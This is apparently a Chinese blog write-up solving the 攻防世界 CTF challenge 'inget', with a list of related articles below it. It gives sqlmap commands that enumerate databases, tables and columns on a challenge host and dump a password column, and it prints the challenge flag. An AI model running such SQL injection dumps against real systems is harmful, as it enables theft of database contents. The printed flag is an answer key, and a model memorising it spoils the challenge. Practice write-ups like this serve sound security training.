攻防世界--inget

简介: 攻防世界--inget

做题记录(这道题考察sql注入用到了sqlmap)

1.来到题目链接(提示请输入ID,然后尝试绕过)

2.在kali中使用sqlmap,在终端输入/usr/share/sqlmap  进入sqlmap,接下来爆数据库

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -dbs

3.得到数据库名

4.接下来爆表名(只需要修改后面的就可)

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -D cyber --tables

5.接下来爆字段

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -D cyber -T cyber --columns

6.选择pw字段就可以看到里面的信息(flag)

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -D cyber -T cyber -C pw -dump

cyberpeace{9934cf86dfe743c229c10d38da957f6d}

相关文章
|
5月前
|
SQL 安全 物联网
网络安全与信息安全:从漏洞到防护的技术之旅
【7月更文挑战第21天】在数字化时代的浪潮中,网络和信息安全成为维系社会稳定、保护个人隐私的关键。本文深入探讨了网络安全的常见漏洞、加密技术的重要性以及提升安全意识的必要性,旨在为读者提供一场从潜在风险到安全防护措施的全面技术之旅。通过分析最新的攻击手段和防御策略,我们揭示了在日益复杂的网络环境中保持警惕性的重要性,同时强调了用户教育在构建安全文化中的作用。
44 1
|
7月前
|
安全 PHP 数据安全/隐私保护
攻防世界17.fileinclude
攻防世界17.fileinclude
|
7月前
|
SQL 数据库 数据安全/隐私保护
攻防世界14-inget
攻防世界14-inget
|
7月前
|
PHP
攻防世界18.fileclude
攻防世界18.fileclude
|
7月前
|
存储 安全 数据安全/隐私保护
【攻防世界】catcat-new
【攻防世界】catcat-new
|
SQL 数据库
攻防世界-fakebook
攻防世界-fakebook
67 0
攻防世界 Mysterious
攻防世界 Mysterious
67 0
攻防世界miscBanmabanma
攻防世界miscBanmabanma
106 0
|
安全 网络安全
防御社会工程攻击的基本实践
防御社会工程攻击的基本实践
|
NoSQL 安全 Shell
『攻防』记一次EDU攻防演练
『攻防』记一次EDU攻防演练
189 0
『攻防』记一次EDU攻防演练

热门文章

最新文章